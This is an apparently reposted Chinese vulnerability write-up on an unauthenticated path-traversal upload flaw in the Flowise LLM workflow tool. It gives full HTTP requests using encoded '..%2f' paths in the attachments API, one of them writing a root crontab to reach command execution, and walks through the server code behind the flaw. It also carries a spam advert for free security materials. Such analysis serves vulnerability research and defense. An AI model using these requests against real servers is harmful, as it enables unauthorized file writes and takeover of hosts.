马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
漏洞简介
Flowise是一款与LangChain兼容的开源低代码工具,使普通用户和开发人员都能通过可视化连线方式创建LLM工作流和AI应用。然而该平台存在严峻的文件上传漏洞——尽管Flowise实施了上传校验机制,攻击者仍可通过特殊编码绕过限制,实现任意目录的文件写入。这一安全缺陷使未经授权的攻击者可以或许上传恶意文件、脚本或SSH密钥,从而获取对托管服务器的远程控制权,对使用该平台构建AI代理的组织构成庞大安全威胁。
漏洞复现
[img=720,226.73454545454547]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524044.png[/img]
[img=720,219.81925343811395]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524047.png[/img]
安装环境后构造上传的数据包- POST /api/v1/attachments/test/test HTTP/1.1
- Host: localhost:3000
- Accept: application/json, text/plain, */*
- x-request-from: internal
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
- Sec-Fetch-Site: same-origin
- Sec-Fetch-Mode: cors
- Sec-Fetch-Dest: empty
- Referer: http://localhost:3000/apikey
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Connection: close
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
- Content-Length: 215
-
- ------WebKitFormBoundary7MA4YWxkTrZu0gW
- Content-Disposition: form-data; name="files"; filename="test.txt"
- Content-Type: text/plain
-
- This is the content of the file.
- ------WebKitFormBoundary7MA4YWxkTrZu0gW--
-
-
[img=720,320.90625]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524048.png[/img]
在服务器上查找上传文件的位置
[img=720,83.62976406533575]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524049.png[/img]
再次构造数据包- POST /api/v1/attachments/..%2ftest/test HTTP/1.1
- Host: localhost:3000
- Accept: application/json, text/plain, */*
- x-request-from: internal
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
- Sec-Fetch-Site: same-origin
- Sec-Fetch-Mode: cors
- Sec-Fetch-Dest: empty
- Referer: http://localhost:3000/apikey
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Connection: close
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
- Content-Length: 215
-
- ------WebKitFormBoundary7MA4YWxkTrZu0gW
- Content-Disposition: form-data; name="files"; filename="test.txt"
- Content-Type: text/plain
-
- This is the content of the file.
- ------WebKitFormBoundary7MA4YWxkTrZu0gW--
-
[img=720,322.37964774951075]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524050.png[/img]
在服务器上再次查找文件位置
[img=720,93.53474320241692]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524051.png[/img]
乐成实现超过目录的上传操作
【----资助网安学习,以下所有学习资料免费领!加vx:yj520400,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
进一步的举行利用的话 可以通过向定时任务中写入文件实现任意命令实行- POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2fusr/..%2fvar%2fspool%2fcron%2fcrontabs HTTP/1.1
- Host: localhost:3000
- Accept: application/json, text/plain, */*
- x-request-from: internal
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
- Sec-Fetch-Site: same-origin
- Sec-Fetch-Mode: cors
- Sec-Fetch-Dest: empty
- Referer: http://localhost:3000/apikey
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Connection: close
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
- Content-Length: 657
-
- ------WebKitFormBoundary7MA4YWxkTrZu0gW
- Content-Disposition: form-data; name="files"; filename="root"
- Content-Type: text/plain
-
- # do daily/weekly/monthly maintenance
- # min hour day month weekday command
- */15 * * * * run-parts /etc/periodic/15min
- 0 * * * * run-parts /etc/periodic/hourly
- 0 2 * * * run-parts /etc/periodic/daily
- 0 3 * * 6 run-parts /etc/periodic/weekly
- 0 5 1 * * run-parts /etc/periodic/monthly
- * * * * * echo "a" >> /tmp/test.txt
- ------WebKitFormBoundary7MA4YWxkTrZu0gW--
[img=720,319.8289867464729]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524052.png[/img]
[img=720,104.97936726272353]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524053.png[/img]
[img=720,204.48979591836735]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524054.png[/img]
漏洞分析
在Flowise平台的焦点架构中,通过constants.ts文件定义了一系列无需认证即可访问的API端点,这些端点被归类为WHITELIST_URLS。该设计允许特定功能(如API密钥验证、公共谈天流和文件操作等)在未经认证的环境下运行,以提高用户体验和系统灵活性。
Flowise-main/packages/server/src/utils/constants.ts
[img=720,346.9126424308193]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524055.png[/img]
当服务器吸收到新的HTTP请求时,其鉴权流程遵照严格的逻辑顺序:起首检查请求路径是否包含"/api/v1"前缀(不区分大小写);接着举行大小写敏感的路径验证;随后系统会判断该URL是否存在于预定义的白名单中。若请求路径已被列入白名单,则继承处理;否则,系统会进一步检查请求头中是否包含"internal"标记,或尝试验证API密钥。
Flowise-main/packages/server/src/index.ts
[img=720,330.05253940455344]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524056.png[/img]
Flowise-main/packages/server/src/routes/attachments/index.ts
[img=720,128.45953002610966]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524057.png[/img]
Flowise-main/packages/server/src/services/attachments/index.ts#createFileAttachment
[img=720,256.5941101152369]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524058.png[/img]
/api/v1/attachments/ 路由下存在上传创建文件的操作
Flowise-main/packages/server/src/utils/createAttachment.ts#createFileAttachment
[img=720,350.4778156996587]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524059.png[/img]
createFileAttachment 中会调用 addArrayFilesToStorage 来对文件举行处理
此时我们也可以看到对应的所有上传路由 /api/v1/attachments/:chatflowId/:chatId
Flowise-main/packages/components/src/storageUtils.ts#addArrayFilesToStorage
[img=720,203.27586206896552]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503271524060.png[/img]
在 addArrayFilesToStorage 中对文件地址举行处理时,会将 chatflowId 和 chatId 未经处理也直接拼接到路径中,所以可以通过编码就直接绕过目录限制实现跨目录的上传。
更多网安技能的在线实操练习,请点击这里>>
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 | 
